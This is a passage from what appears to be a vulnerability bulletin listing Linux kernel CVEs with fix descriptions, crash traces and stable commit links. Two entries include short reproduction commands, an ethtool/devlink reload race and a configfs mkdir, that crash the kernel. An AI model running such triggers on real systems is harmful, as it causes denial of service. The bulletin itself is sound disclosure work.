waitqueue and of the file associated with the trigger are different. Fix this by using kernfs_generic_poll function when polling on cgroup-specific psi triggers. It internally uses kernfs_open_node->poll waitqueue head with its lifecycle tied to the file's lifecycle. This also renders the fix in [1] obsolete, so revert it. [1] commit c2dbe32d5db5 ("sched/psi: Fix use-after-free in ep_remove_wait_queue()") | 2025-12-24 | not yet calculated | CVE-2023-54019 | https://git.kernel.org/stable/c/92cc0153324b6ae8577a39f5bf2cd83c9a34ea6a https://git.kernel.org/stable/c/d124ab17024cc85a1079b7810a018a497ebc13da https://git.kernel.org/stable/c/aff037078ecaecf34a7c2afab1341815f90fba5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: sf-pdma: pdma_desc memory leak fix Commit b2cc5c465c2c ("dmaengine: sf-pdma: Add multithread support for a DMA channel") changed sf_pdma_prep_dma_memcpy() to unconditionally allocate a new sf_pdma_desc each time it is called. The driver previously recycled descs, by checking the in_use flag, only allocating additional descs if the existing one was in use. This logic was removed in commit b2cc5c465c2c ("dmaengine: sf-pdma: Add multithread support for a DMA channel"), but sf_pdma_free_desc() was not changed to handle the new behaviour. As a result, each time sf_pdma_prep_dma_memcpy() is called, the previous descriptor is leaked, over time leading to memory starvation: unreferenced object 0xffffffe008447300 (size 192): comm "irq/39-mchp_dsc", pid 343, jiffies 4294906910 (age 981.200s) hex dump (first 32 bytes): 00 00 00 ff 00 00 00 00 b8 c1 00 00 00 00 00 00 ................ 00 00 70 08 10 00 00 00 00 00 00 c0 00 00 00 00 ..p............. backtrace: [<00000000064a04f4>] kmemleak_alloc+0x1e/0x28 [<00000000018927a7>] kmem_cache_alloc+0x11e/0x178 [<000000002aea8d16>] sf_pdma_prep_dma_memcpy+0x40/0x112 Add the missing kfree() to sf_pdma_free_desc(), and remove the redundant in_use flag. | 2025-12-24 | not yet calculated | CVE-2023-54020 | https://git.kernel.org/stable/c/ad222c9af25e3f074c180e389b3477dce42afc4f https://git.kernel.org/stable/c/03fece43fa109beba7cc9948c02f5e2d1205d607 https://git.kernel.org/stable/c/8bd5040bd43f2b5ba3c898b09a3197a0c7ace126 https://git.kernel.org/stable/c/b02e07015a5ac7bbc029da931ae17914b8ae0339 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: set goal start correctly in ext4_mb_normalize_request We need to set ac_g_ex to notify the goal start used in ext4_mb_find_by_goal. Set ac_g_ex instead of ac_f_ex in ext4_mb_normalize_request. Besides we should assure goal start is in range [first_data_block, blocks_count) as ext4_mb_initialize_context does. [ Added a check to make sure size is less than ar->pright; otherwise we could end up passing an underflowed value of ar->pright - size to ext4_get_group_no_and_offset(), which will trigger a BUG_ON later on. - TYT ] | 2025-12-24 | not yet calculated | CVE-2023-54021 | https://git.kernel.org/stable/c/2479bb6cbdb4d56b807bbe5229e3e26a6f1f4530 https://git.kernel.org/stable/c/390eee955d4de4662db5e3e9e9a9eae020432cb7 https://git.kernel.org/stable/c/cee78217a7ae72d11c2e21e1a5263b8044489823 https://git.kernel.org/stable/c/3ca3005b502ca8ea87d6a344323b179b48c4e4a3 https://git.kernel.org/stable/c/bc4a3e1d07a86ae5845321d371190244acacb2f2 https://git.kernel.org/stable/c/c6bee8970075b256fc1b07bf4873049219380818 https://git.kernel.org/stable/c/abb330ffaa3a0ae7ce632e28c9260b461c01f19f https://git.kernel.org/stable/c/b07ffe6927c75d99af534d685282ea188d9f71a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix potential memory leaks at error path for UMP open The allocation and initialization errors at alloc_midi_urbs() that is called at MIDI 2.0 / UMP device are supposed to be handled at the caller side by invoking free_midi_urbs(). However, free_midi_urbs() loops only for ep->num_urbs entries, and since ep->num_entries wasn't updated yet at the allocation / init error in alloc_midi_urbs(), this entry won't be released. The intention of free_midi_urbs() is to release the whole elements, so change the loop size to NUM_URBS to scan over all elements for fixing the missed releases. Also, the call of free_midi_urbs() is missing at snd_usb_midi_v2_open(). Although it'll be released later at reopen/close or disconnection, it's better to release immediately at the error path. | 2025-12-24 | not yet calculated | CVE-2023-54022 | https://git.kernel.org/stable/c/f819b343aa95d24d5f7d6e06660c7f62591abc5f https://git.kernel.org/stable/c/b1757fa30ef14f254f4719bf6f7d54a4c8207216 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race between balance and cancel/pause Syzbot reported a panic that looks like this: assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED, in fs/btrfs/ioctl.c:465 ------------[ cut here ]------------ kernel BUG at fs/btrfs/messages.c:259! RIP: 0010:btrfs_assertfail+0x2c/0x30 fs/btrfs/messages.c:259 Call Trace: <TASK> btrfs_exclop_balance fs/btrfs/ioctl.c:465 [inline] btrfs_ioctl_balance fs/btrfs/ioctl.c:3564 [inline] btrfs_ioctl+0x531e/0x5b30 fs/btrfs/ioctl.c:4632 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl fs/ioctl.c:856 [inline] __x64_sys_ioctl+0x197/0x210 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The reproducer is running a balance and a cancel or pause in parallel. The way balance finishes is a bit wonky, if we were paused we need to save the balance_ctl in the fs_info, but clear it otherwise and cleanup. However we rely on the return values being specific errors, or having a cancel request or no pause request. If balance completes and returns 0, but we have a pause or cancel request we won't do the appropriate cleanup, and then the next time we try to start a balance we'll trip this ASSERT. The error handling is just wrong here, we always want to clean up, unless we got -ECANCELLED and we set the appropriate pause flag in the exclusive op. With this patch the reproducer ran for an hour without tripping, previously it would trip in less than a few minutes. | 2025-12-24 | not yet calculated | CVE-2023-54023 | https://git.kernel.org/stable/c/ddf7e8984c83aee9122552529f4e77291903f8d9 https://git.kernel.org/stable/c/72efe5d44821e38540888a5fe3ff3d0faab6acad https://git.kernel.org/stable/c/b19c98f237cd76981aaded52c258ce93f7daa8cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: Destroy target device if coalesced MMIO unregistration fails Destroy and free the target coalesced MMIO device if unregistering said device fails. As clearly noted in the code, kvm_io_bus_unregister_dev() does not destroy the target device. BUG: memory leak unreferenced object 0xffff888112a54880 (size 64): comm "syz-executor.2", pid 5258, jiffies 4297861402 (age 14.129s) hex dump (first 32 bytes): 38 c7 67 15 00 c9 ff ff 38 c7 67 15 00 c9 ff ff 8.g.....8.g..... e0 c7 e1 83 ff ff ff ff 00 30 67 15 00 c9 ff ff .........0g..... backtrace: [<0000000006995a8a>] kmalloc include/linux/slab.h:556 [inline] [<0000000006995a8a>] kzalloc include/linux/slab.h:690 [inline] [<0000000006995a8a>] kvm_vm_ioctl_register_coalesced_mmio+0x8e/0x3d0 arch/x86/kvm/../../../virt/kvm/coalesced_mmio.c:150 [<00000000022550c2>] kvm_vm_ioctl+0x47d/0x1600 arch/x86/kvm/../../../virt/kvm/kvm_main.c:3323 [<000000008a75102f>] vfs_ioctl fs/ioctl.c:46 [inline] [<000000008a75102f>] file_ioctl fs/ioctl.c:509 [inline] [<000000008a75102f>] do_vfs_ioctl+0xbab/0x1160 fs/ioctl.c:696 [<0000000080e3f669>] ksys_ioctl+0x76/0xa0 fs/ioctl.c:713 [<0000000059ef4888>] __do_sys_ioctl fs/ioctl.c:720 [inline] [<0000000059ef4888>] __se_sys_ioctl fs/ioctl.c:718 [inline] [<0000000059ef4888>] __x64_sys_ioctl+0x6f/0xb0 fs/ioctl.c:718 [<000000006444fa05>] do_syscall_64+0x9f/0x4e0 arch/x86/entry/common.c:290 [<000000009a4ed50b>] entry_SYSCALL_64_after_hwframe+0x49/0xbe BUG: leak checking failed | 2025-12-24 | not yet calculated | CVE-2023-54024 | https://git.kernel.org/stable/c/10c2a20d73e99463e69b7e92706791656adc16d7 https://git.kernel.org/stable/c/76a9886e1b61ce5592df5ae78a19ed30399ae189 https://git.kernel.org/stable/c/999439fd5da5a76253e2f2c37b94204f47d75491 https://git.kernel.org/stable/c/ccf6a7fb1aedb1472e1241ee55e4d26b68f8d066 https://git.kernel.org/stable/c/fb436dd6914325075f07d19851ab277b7a693ae7 https://git.kernel.org/stable/c/b1cb1fac22abf102ffeb29dd3eeca208a3869d54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: Do not configure WoWlan in shutdown hook if not enabled In case WoWlan was never configured during the operation of the system, the hw->wiphy->wowlan_config will be NULL. rsi_config_wowlan() checks whether wowlan_config is non-NULL and if it is not, then WARNs about it. The warning is valid, as during normal operation the rsi_config_wowlan() should only ever be called with non-NULL wowlan_config. In shutdown this rsi_config_wowlan() should only ever be called if WoWlan was configured before by the user. Add checks for non-NULL wowlan_config into the shutdown hook. While at it, check whether the wiphy is also non-NULL before accessing wowlan_config . Drop the single-use wowlan_config variable, just inline it into function call. | 2025-12-24 | not yet calculated | CVE-2023-54025 | https://git.kernel.org/stable/c/b2aeb97fd470206e67f7b3b4a3e68212a13f747b https://git.kernel.org/stable/c/4391fa180856ff84a2cef4a92694a689eebb855e https://git.kernel.org/stable/c/eb205a06908122f50b1dd1baa43f7c8036bfc7dc https://git.kernel.org/stable/c/1b51236aa49a0564280bd45c94118cab6d9b0fbd https://git.kernel.org/stable/c/b601468539c1d97539097bfc87ad11f1704b7eb7 https://git.kernel.org/stable/c/b241e260820b68c09586e8a0ae0fc23c0e3215bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: opp: Fix use-after-free in lazy_opp_tables after probe deferral When dev_pm_opp_of_find_icc_paths() in _allocate_opp_table() returns -EPROBE_DEFER, the opp_table is freed again, to wait until all the interconnect paths are available. However, if the OPP table is using required-opps then it may already have been added to the global lazy_opp_tables list. The error path does not remove the opp_table from the list again. This can cause crashes later when the provider of the required-opps is added, since we will iterate over OPP tables that have already been freed. E.g.: Unable to handle kernel NULL pointer dereference when read CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.4.0-rc3 PC is at _of_add_opp_table_v2 (include/linux/of.h:949 drivers/opp/of.c:98 drivers/opp/of.c:344 drivers/opp/of.c:404 drivers/opp/of.c:1032) -> lazy_link_required_opp_table() Fix this by calling _of_clear_opp_table() to remove the opp_table from the list and clear other allocated resources. While at it, also add the missing mutex_destroy() calls in the error path. | 2025-12-24 | not yet calculated | CVE-2023-54026 | https://git.kernel.org/stable/c/39a0e723d3502f6dc4c603f57ebe8dc7bcc4a4bc https://git.kernel.org/stable/c/76ab057de777723ec924654502d1a260ba7d7d54 https://git.kernel.org/stable/c/c05e76d6b249e5254c31994eedd06dd3cc90dee0 https://git.kernel.org/stable/c/b2a2ab039bd58f51355e33d7d3fc64605d7f870d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: core: Prevent invalid memory access when there is no parent Commit 813665564b3d ("iio: core: Convert to use firmware node handle instead of OF node") switched the kind of nodes to use for label retrieval in device registration. Probably an unwanted change in that commit was that if the device has no parent then NULL pointer is accessed. This is what happens in the stock IIO dummy driver when a new entry is created in configfs: # mkdir /sys/kernel/config/iio/devices/dummy/foo BUG: kernel NULL pointer dereference, address: ... ... Call Trace: __iio_device_register iio_dummy_probe Since there seems to be no reason to make a parent device of an IIO dummy device mandatory, let's prevent the invalid memory access in __iio_device_register when the parent device is NULL. With this change, the IIO dummy driver works fine with configfs. | 2025-12-24 | not yet calculated | CVE-2023-54027 | https://git.kernel.org/stable/c/312f04ede209f0a186799fe8e64a19b49700d5dc https://git.kernel.org/stable/c/a4b34cccff14ce74bb7d77fbfd56e7c9d7c28a97 https://git.kernel.org/stable/c/b2a69969908fcaf68596dfc04369af0fe2e1d2f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix the error "trying to register non-static key in rxe_cleanup_task" In the function rxe_create_qp(), rxe_qp_from_init() is called to initialize qp, internally things like rxe_init_task are not setup until rxe_qp_init_req(). If an error occurred before this point then the unwind will call rxe_cleanup() and eventually to rxe_qp_do_cleanup()/rxe_cleanup_task() which will oops when trying to access the uninitialized spinlock. If rxe_init_task is not executed, rxe_cleanup_task will not be called. | 2025-12-24 | not yet calculated | CVE-2023-54028 | https://git.kernel.org/stable/c/3236221bb8e4de8e3d0c8385f634064fb26b8e38 https://git.kernel.org/stable/c/c8473cd5b301279a41dc75e5afb26b3d5223b6c7 https://git.kernel.org/stable/c/0d938264fcfe4927e54f0e519da05af1d5d720b4 https://git.kernel.org/stable/c/b2b1ddc457458fecd1c6f385baa9fbda5f0c63ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix iwl_mvm_max_amsdu_size() for MLO For MLO, we cannot use vif->bss_conf.chandef.chan->band, since that will lead to a NULL-ptr dereference as bss_conf isn't used. However, in case of real MLO, we also need to take both LMACs into account if they exist, since the station might be active on both LMACs at the same time. | 2025-12-24 | not yet calculated | CVE-2023-54029 | https://git.kernel.org/stable/c/63e2d06adf6b0842132ba89efdf8fada5f7ff1ac https://git.kernel.org/stable/c/4489aa868bc6343afdaf5ef324af5b1f64962b25 https://git.kernel.org/stable/c/b2bc600cced23762d4e97db8989b18772145604f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/net: don't overflow multishot recv Don't allow overflowing multishot recv CQEs, it might get out of hand, hurt performance, and in the worst case scenario OOM the task. | 2025-12-24 | not yet calculated | CVE-2023-54030 | https://git.kernel.org/stable/c/1e2db9837be7d24a2a74eb3f3906d0872bee8907 https://git.kernel.org/stable/c/b2e74db55dd93d6db22a813c9a775b5dbf87c560 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa: Add queue index attr to vdpa_nl_policy for nlattr length check The vdpa_nl_policy structure is used to validate the nlattr when parsing the incoming nlmsg. It will ensure the attribute being described produces a valid nlattr pointer in info->attrs before entering into each handler in vdpa_nl_ops. That is to say, the missing part in vdpa_nl_policy may lead to illegal nlattr after parsing, which could lead to OOB read just like CVE-2023-3773. This patch adds the missing nla_policy for vdpa queue index attr to avoid such bugs. | 2025-12-24 | not yet calculated | CVE-2023-54031 | https://git.kernel.org/stable/c/8ad9bc25cbdcec72e7ca43dd8281decb69ea9a70 https://git.kernel.org/stable/c/ccb533b7070aeeb65c66ea5d590e9c62421dcd61 https://git.kernel.org/stable/c/b3003e1b54e057f5f3124e437b80c3bef26ed3fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race when deleting quota root from the dirty cow roots list When disabling quotas we are deleting the quota root from the list fs_info->dirty_cowonly_roots without taking the lock that protects it, which is struct btrfs_fs_info::trans_lock. This unsynchronized list manipulation may cause chaos if there's another concurrent manipulation of this list, such as when adding a root to it with ctree.c:add_root_to_dirty_list(). This can result in all sorts of weird failures caused by a race, such as the following crash: [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.279928] Code: 85 38 06 00 (...) [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206 [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000 [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070 [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600 [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48 [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000 [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0 [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [337571.282874] Call Trace: [337571.283101] <TASK> [337571.283327] ? __die_body+0x1b/0x60 [337571.283570] ? die_addr+0x39/0x60 [337571.283796] ? exc_general_protection+0x22e/0x430 [337571.284022] ? asm_exc_general_protection+0x22/0x30 [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs] [337571.284803] ? _raw_spin_unlock+0x15/0x30 [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs] [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs] [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs] [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410 [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs] [337571.286358] ? mod_objcg_state+0xd2/0x360 [337571.286577] ? refill_obj_stock+0xb0/0x160 [337571.286798] ? seq_release+0x25/0x30 [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0 [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0 [337571.287455] ? __x64_sys_ioctl+0x88/0xc0 [337571.287675] __x64_sys_ioctl+0x88/0xc0 [337571.287901] do_syscall_64+0x38/0x90 [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc [337571.288352] RIP: 0033:0x7f478aaffe9b So fix this by locking struct btrfs_fs_info::trans_lock before deleting the quota root from that list. | 2025-12-24 | not yet calculated | CVE-2023-54032 | https://git.kernel.org/stable/c/365f318da7384cbac5de6b9c098914888a4d63e7 https://git.kernel.org/stable/c/6da229754099518cfa27cbfcd0fd042618785fad https://git.kernel.org/stable/c/679c34821ab7cd93c8ccb96fbf57fc44848a78bc https://git.kernel.org/stable/c/6819bb0b8552dcc5f82ca606c8911b8c67e0628f https://git.kernel.org/stable/c/7ba0da31dd4a8fd24d416016c538a95a5664ff02 https://git.kernel.org/stable/c/a53d78d9a8551e72c46ded23e8b0a56e55d32032 https://git.kernel.org/stable/c/a5cdc4012efa808e07d073c11dc2f366b5394ad3 https://git.kernel.org/stable/c/b31cb5a6eb7a48b0a7bfdf06832b1fd5088d8c79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: fix a memory leak in the LRU and LRU_PERCPU hash maps The LRU and LRU_PERCPU maps allocate a new element on update before locking the target hash table bucket. Right after that the maps try to lock the bucket. If this fails, then maps return -EBUSY to the caller without releasing the allocated element. This makes the element untracked: it doesn't belong to either of free lists, and it doesn't belong to the hash table, so can't be re-used; this eventually leads to the permanent -ENOMEM on LRU map updates, which is unexpected. Fix this by returning the element to the local free list if bucket locking fails. | 2025-12-24 | not yet calculated | CVE-2023-54033 | https://git.kernel.org/stable/c/79ea1a12fb9a8275b6e19d4ca625dd872dedcbb9 https://git.kernel.org/stable/c/1a9e80f757bbb1562d82e350afce2bb2f712cc3d https://git.kernel.org/stable/c/965e9cccbe6b9c7b379908cebcb5e3a47f20dd5e https://git.kernel.org/stable/c/b34ffb0c6d23583830f9327864b9c1f486003305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Make sure to zero vfio_iommu_type1_info before copying to user Missed a zero initialization here. Most of the struct is filled with a copy_from_user(), however minsz for that copy is smaller than the actual struct by 8 bytes, thus we don't fill the padding. | 2025-12-24 | not yet calculated | CVE-2023-54034 | https://git.kernel.org/stable/c/7adcec686e4d699c169d34c722132b2bce5232cb https://git.kernel.org/stable/c/b3551ead616318ea155558cdbe7e91495b8d9b33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix underflow in chain reference counter Set element addition error path decrements reference counter on chains twice: once on element release and again via nft_data_release(). Then, d6b478666ffa ("netfilter: nf_tables: fix underflow in object reference counter") incorrectly fixed this by removing the stateful object reference count decrement. Restore the stateful object decrement as in b91d90368837 ("netfilter: nf_tables: fix leaking object reference count") and let nft_data_release() decrement the chain reference counter, so this is done only once. | 2025-12-24 | not yet calculated | CVE-2023-54035 | https://git.kernel.org/stable/c/b068314fd8ce751a7f906e55bb90f3551815f1a0 https://git.kernel.org/stable/c/9c959671abc7d4ffdf34eed10c64492d43cb6a3c https://git.kernel.org/stable/c/b389139f12f287b8ed2e2628b72df89a081f0b59 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl8xxxu: Fix memory leaks with RTL8723BU, RTL8192EU The wifi + bluetooth combo chip RTL8723BU can leak memory (especially?) when it's connected to a bluetooth audio device. The busy bluetooth traffic generates lots of C2H (card to host) messages, which are not freed correctly. To fix this, move the dev_kfree_skb() call in rtl8xxxu_c2hcmd_callback() inside the loop where skb_dequeue() is called. The RTL8192EU leaks memory because the C2H messages are added to the queue and left there forever. (This was fine in the past because it probably wasn't sending any C2H messages until commit e542e66b7c2e ("wifi: rtl8xxxu: gen2: Turn on the rate control"). Since that commit it sends a C2H message when the TX rate changes.) To fix this, delete the check for rf_paths > 1 and the goto. Let the function process the C2H messages from RTL8192EU like the ones from the other chips. Theoretically the RTL8188FU could also leak like RTL8723BU, but it most likely doesn't send C2H messages frequently enough. This change was tested with RTL8723BU by Erhard F. I tested it with RTL8188FU and RTL8192EU. | 2025-12-24 | not yet calculated | CVE-2023-54036 | https://git.kernel.org/stable/c/430f9f9bec53a75f9ccc53e156a66f13fc098b83 https://git.kernel.org/stable/c/35fb0e275af1aa1ca0a9784417e90f988aaf8e78 https://git.kernel.org/stable/c/93c3f34ec02fc81188d328287d4fddd498ccddea https://git.kernel.org/stable/c/f39a86b4efd270947ee252cc32a30b0aef492d65 https://git.kernel.org/stable/c/b39f662ce1648db0b9de32e6a849b098480793cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: prevent NULL pointer deref during reload Calling ethtool during reload can lead to call trace, because VSI isn't configured for some time, but netdev is alive. To fix it add rtnl lock for VSI deconfig and config. Set ::num_q_vectors to 0 after freeing and add a check for ::tx/rx_rings in ring related ethtool ops. Add proper unroll of filters in ice_start_eth(). Reproduction: $watch -n 0.1 -d 'ethtool -g enp24s0f0np0' $devlink dev reload pci/0000:18:00.0 action driver_reinit Call trace before fix: [66303.926205] BUG: kernel NULL pointer dereference, address: 0000000000000000 [66303.926259] #PF: supervisor read access in kernel mode [66303.926286] #PF: error_code(0x0000) - not-present page [66303.926311] PGD 0 P4D 0 [66303.926332] Oops: 0000 [#1] PREEMPT SMP PTI [66303.926358] CPU: 4 PID: 933821 Comm: ethtool Kdump: loaded Tainted: G OE 6.4.0-rc5+ #1 [66303.926400] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.00.01.0014.070920180847 07/09/2018 [66303.926446] RIP: 0010:ice_get_ringparam+0x22/0x50 [ice] [66303.926649] Code: 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 48 8b 87 c0 09 00 00 c7 46 04 e0 1f 00 00 c7 46 10 e0 1f 00 00 48 8b 50 20 <48> 8b 12 0f b7 52 3a 89 56 14 48 8b 40 28 48 8b 00 0f b7 40 58 48 [66303.926722] RSP: 0018:ffffad40472f39c8 EFLAGS: 00010246 [66303.926749] RAX: ffff98a8ada05828 RBX: ffff98a8c46dd060 RCX: ffffad40472f3b48 [66303.926781] RDX: 0000000000000000 RSI: ffff98a8c46dd068 RDI: ffff98a8b23c4000 [66303.926811] RBP: ffffad40472f3b48 R08: 00000000000337b0 R09: 0000000000000000 [66303.926843] R10: 0000000000000001 R11: 0000000000000100 R12: ffff98a8b23c4000 [66303.926874] R13: ffff98a8c46dd060 R14: 000000000000000f R15: ffffad40472f3a50 [66303.926906] FS: 00007f6397966740(0000) GS:ffff98b390900000(0000) knlGS:0000000000000000 [66303.926941] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [66303.926967] CR2: 0000000000000000 CR3: 000000011ac20002 CR4: 00000000007706e0 [66303.926999] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [66303.927029] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [66303.927060] PKRU: 55555554 [66303.927075] Call Trace: [66303.927094] <TASK> [66303.927111] ? __die+0x23/0x70 [66303.927140] ? page_fault_oops+0x171/0x4e0 [66303.927176] ? exc_page_fault+0x7f/0x180 [66303.927209] ? asm_exc_page_fault+0x26/0x30 [66303.927244] ? ice_get_ringparam+0x22/0x50 [ice] [66303.927433] rings_prepare_data+0x62/0x80 [66303.927469] ethnl_default_doit+0xe2/0x350 [66303.927501] genl_family_rcv_msg_doit.isra.0+0xe3/0x140 [66303.927538] genl_rcv_msg+0x1b1/0x2c0 [66303.927561] ? __pfx_ethnl_default_doit+0x10/0x10 [66303.927590] ? __pfx_genl_rcv_msg+0x10/0x10 [66303.927615] netlink_rcv_skb+0x58/0x110 [66303.927644] genl_rcv+0x28/0x40 [66303.927665] netlink_unicast+0x19e/0x290 [66303.927691] netlink_sendmsg+0x254/0x4d0 [66303.927717] sock_sendmsg+0x93/0xa0 [66303.927743] __sys_sendto+0x126/0x170 [66303.927780] __x64_sys_sendto+0x24/0x30 [66303.928593] do_syscall_64+0x5d/0x90 [66303.929370] ? __count_memcg_events+0x60/0xa0 [66303.930146] ? count_memcg_events.constprop.0+0x1a/0x30 [66303.930920] ? handle_mm_fault+0x9e/0x350 [66303.931688] ? do_user_addr_fault+0x258/0x740 [66303.932452] ? exc_page_fault+0x7f/0x180 [66303.933193] entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-24 | not yet calculated | CVE-2023-54037 | https://git.kernel.org/stable/c/ca03b327224ed6be2d07f42ee6ee1cdd586cfd5b https://git.kernel.org/stable/c/b3e7b3a6ee92ab927f750a6b19615ce88ece808f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_conn: return ERR_PTR instead of NULL when there is no link hci_connect_sco currently returns NULL when there is no link (i.e. when hci_conn_link() returns NULL). sco_connect() expects an ERR_PTR in case of any error (see line 266 in sco.c). Thus, hcon set as NULL passes through to sco_conn_add(), which tries to get hcon->hdev, resulting in dereferencing a NULL pointer as reported by syzkaller. The same issue exists for iso_connect_cis() calling hci_connect_cis(). Thus, make hci_connect_sco() and hci_connect_cis() return ERR_PTR instead of NULL. | 2025-12-24 | not yet calculated | CVE-2023-54038 | https://git.kernel.org/stable/c/357ab53c83a5322437fa434e9a9e3e0bafe6b383 https://git.kernel.org/stable/c/b4066eb04bb67e7ff66e5aaab0db4a753f37eaad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: j1939: j1939_tp_tx_dat_new(): fix out-of-bounds memory access In the j1939_tp_tx_dat_new() function, an out-of-bounds memory access could occur during the memcpy() operation if the size of skb->cb is larger than the size of struct j1939_sk_buff_cb. This is because the memcpy() operation uses the size of skb->cb, leading to a read beyond the struct j1939_sk_buff_cb. Updated the memcpy() operation to use the size of struct j1939_sk_buff_cb instead of the size of skb->cb. This ensures that the memcpy() operation only reads the memory within the bounds of struct j1939_sk_buff_cb, preventing out-of-bounds memory access. Additionally, add a BUILD_BUG_ON() to check that the size of skb->cb is greater than or equal to the size of struct j1939_sk_buff_cb. This ensures that the skb->cb buffer is large enough to hold the j1939_sk_buff_cb structure. [mkl: rephrase commit message] | 2025-12-24 | not yet calculated | CVE-2023-54039 | https://git.kernel.org/stable/c/d2136f05690c272dfc9f9d6efcc51d5f53494b33 https://git.kernel.org/stable/c/70caa596d158a5d84b117f722d58f3ea503a5ba9 https://git.kernel.org/stable/c/4fe1d9b6231a68ffc91318f57fd8e4982f028cf7 https://git.kernel.org/stable/c/4c3fb22a6ec68258ee129a2e6b720f43dffc562f https://git.kernel.org/stable/c/36befc9aed6202b4a9b906529aea13eacd7e34ff https://git.kernel.org/stable/c/b45193cb4df556fe6251b285a5ce44046dd36b4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix wrong fallback logic for FDIR When adding a FDIR filter, if ice_vc_fdir_set_irq_ctx returns failure, the inserted fdir entry will not be removed and if ice_vc_fdir_write_fltr returns failure, the fdir context info for irq handler will not be cleared which may lead to inconsistent or memory leak issue. This patch refines failure cases to resolve this issue. | 2025-12-24 | not yet calculated | CVE-2023-54040 | https://git.kernel.org/stable/c/391d28c0e38c0e5b11a4240a2b4976cf63e87f45 https://git.kernel.org/stable/c/aad3b871efe26f36f45f8b4649653b5d3fd9c35e https://git.kernel.org/stable/c/cbfed5f114b5310f221979fc8190f55c6abc3400 https://git.kernel.org/stable/c/b4a01ace20f5c93c724abffc0a83ec84f514b98d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix memory leak when removing provided buffers When removing provided buffers, io_buffer structs are not being disposed of, leading to a memory leak. They can't be freed individually, because they are allocated in page-sized groups. They need to be added to some free list instead, such as io_buffers_cache. All callers already hold the lock protecting it, apart from when destroying buffers, so had to extend the lock there. | 2025-12-24 | not yet calculated | CVE-2023-54041 | https://git.kernel.org/stable/c/ac48787f58d1068f4e06d627c1135784d64b4c72 https://git.kernel.org/stable/c/c117c15927772d1624c29c092b6bd3f47c7faa48 https://git.kernel.org/stable/c/b4a72c0589fdea6259720375426179888969d6a2 |
